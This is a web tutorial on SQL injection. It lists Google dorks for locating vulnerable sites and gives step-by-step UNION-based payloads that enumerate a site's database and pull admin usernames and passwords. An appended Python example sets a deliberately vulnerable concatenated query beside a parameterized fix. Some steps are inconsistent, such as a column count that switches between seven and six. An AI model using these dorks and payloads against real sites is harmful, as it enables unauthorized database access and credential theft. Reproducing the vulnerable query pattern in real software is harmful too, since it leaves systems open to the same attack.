A SQL injection attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

Finding a SQL-vulnerable site: to find a SQL-vulnerable website we will use some Google dorks from the following:
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid=
Step 1: Finding Vulnerable Link –
http://www.site.com/news.php?id=3
Add ‘ after id=3
If a SQL syntax error or a blank page is shown, then the site is vulnerable to SQL injection.
Step 2: Finding Vulnerable Columns –
http://www.site.com/news.php?id=3
order by 8 —
If an error is shown again or a blank page occurs, then
Vulnerable columns are 7.
Step 3: Finding Number of Vulnerable Columns:
http://www.site.com/news.php?id=3
union all select 1,2,3,4,5,6,7 —
If the number 2 is shown, then this column can give us the database, tables and columns.
Step 4: Finding Database
union all select 1,database(),3,4,5,6,7 —
chennaisilks
Step 5: Finding Table Names:
http://www.site.com/news.php?id=3
union all select 1,table_name,3,4,5,6 from information_schema.tables wheretable_schema=’chennaisilks’ —
Step 6: Finding Column Names:
http://www.site.com/news.php?id=3
union all select 1,column_name,3,4,5,6,7
from information_schema.columns where
table_schema=’chennaisilks’ —
Admin table is admin
Admin Columns are
admin_id
user_id
admin_pwd
admin_email
admin_last_login
admin_ip
Step 7: Finding Admin username & password:
http://www.site.com/news.php?id=3
union all select 1,user_id,3,4,5,6,7 from admin —
union all select 1,admin_pwd,3,4,5,6,7 from admin —
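
Every step above depends on the `id` parameter being concatenated into the SQL text. The following added example (not code from the original page) shows that root cause beside the hardened form, using Python and an in-memory SQLite database as a stand-in for the PHP/MySQL page; the `news` table layout and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the news.php backend (7-column table)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
               " author TEXT, created TEXT, tags TEXT, views INTEGER)")
    db.execute("INSERT INTO news VALUES (3, 'Launch', 'text', 'ed', '2020-01-01', 'x', 10)")
    return db

def get_news_vulnerable(db, raw_id):
    # Vulnerable pattern: the request parameter is concatenated into the SQL text,
    # so a quote, ORDER BY or UNION in raw_id becomes part of the statement.
    return db.execute("SELECT * FROM news WHERE id = " + raw_id).fetchall()

def get_news_safe(db, raw_id):
    # Hardened: validate the type first, then bind the value as a parameter.
    # A bound value is sent as data and cannot change the statement's structure.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return db.execute("SELECT * FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def probe(func, raw_id):
    """Classify one request's outcome the way the steps above observe it."""
    db = make_db()
    try:
        rows = func(db, raw_id)
    except sqlite3.Error:
        return "sql-error"      # the symptom Step 1 looks for
    except ValueError:
        return "rejected"       # input never reached the database
    return f"{len(rows)} row(s)"

if __name__ == "__main__":
    # Inputs taken from the steps on this page.
    for value in ["3", "3'", "3 order by 8 --", "3 union all select 1,2,3,4,5,6,7 --"]:
        print(f"{value!r:40} vulnerable={probe(get_news_vulnerable, value):10} "
              f"safe={probe(get_news_safe, value)}")
```

With the parameterized version, the error and extra-row symptoms the steps rely on never appear, and the database account behind the page should additionally be denied access to tables such as `admin` that the page has no reason to read.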